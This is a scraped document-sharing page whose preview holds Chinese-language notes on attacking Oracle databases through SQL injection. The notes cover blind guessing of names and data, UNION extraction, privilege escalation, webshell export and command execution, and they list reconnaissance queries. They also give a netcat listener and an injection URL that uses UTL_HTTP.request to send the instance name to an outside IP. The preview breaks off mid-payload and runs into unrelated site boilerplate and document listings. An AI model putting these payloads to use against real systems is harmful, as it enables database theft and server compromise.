



免费预览已结束,剩余1页可下载查看
下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
Un Oracle注射笔记 电脑资料 Oracle说明: Oracle的注射攻击学习,可以归为: a.基本猜解: 1. 数据库名的猜解,表名的猜解,字段的猜解,数据的猜解.等基本数据的猜解.(半折法) 2. union方式猜解 3. UTL_.request反弹数据猜解.(需能上网) 4. 其它方式的猜解,诸如把表段内容,update或insert入可以显示的字段里,诸如网页,然后读取获知. b.高级攻击方式: 1. 数据库提权攻击,一般是利用函数漏洞,提升为DBA权限.(oracle的DBA相当于mssql的sa,为数据库的最高权限) 2. 导出shell攻击. 3. 利用数据库漏洞,执行系统指定. c.数据库漏洞. 1. 远程溢出,本地提权等漏洞(我们只管exp) 2. 存在的配置方面的漏洞,诸如默认弱口令,以及得到弱口令之后,如何提权等原因. 第一部份: =基本信息的猜解= 说明: Oracle会把一些有用的信息保存在系统表里面,诸如all_tables,所以注射时对这些表的猜解,可以获取到很多的基本信息. 获得操作系统版本: select member from v$logfile where rownum=1 通过路径方式判断操作系统.如果出现c:,d:类的是windows,其它为*nix 查看sid: select instance_name from v$instance 查询当前用户权限 select * from session_roles 当前数据库版本 select banner from sys.v_$version where rownum=1 服务器出口IP 用utl_.request可以实现 服务器监听IP select utl_inaddr.get_host_address from dual 当前连接用户 select SYS_CONTEXT (USERENV, CURRENT_USER) from dual 反弹方式:(本机:nc -vv -lp 8000) .target./servlet/bbsxx.Userdetail?sUserName=test and UTL_.request(59.151.22.37:8000/|(select instance_name from v$instance whe
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025儿童医院学科资源配置优化考核
- 2025第二人民医院科室安全管理执行考核
- 中国飞机涂料项目创业投资方案
- 公司会计兼职劳动合同6篇
- 2025年乡镇垃圾收运系统建设项目可行性研究报告
- 2025年延边松香项目实施方案
- 2025年中油集团建设项目可行性研究报告内容和深度规定
- 2025年企业信息化项目评估报告
- 中国达克宁项目投资计划书
- 旅游项目可行性报告范文
- 老舍《茶馆》三幕话剧剧本
- T-ZSA 288-2024 餐饮设备智能烹饪机器人系统通.用技术要求
- 2025年南京铁道职业技术学院单招职业技能测试题库附答案
- 产教融合视域下高职人才培养质量多元协同评价体系的探索与实践
- 《社区思想政治教育研究的国内外文献综述》4300字
- GB/T 8232-2024粟
- 【MOOC】走进舞蹈艺术-首都师范大学 中国大学慕课MOOC答案
- 村级硬化道路报告范文
- 四年级上册语文 课外阅读专项练习
- 植物医生诊病指南知到智慧树章节测试课后答案2024年秋甘肃农业大学
- 脑卒中中西医结合治疗
评论
0/150
提交评论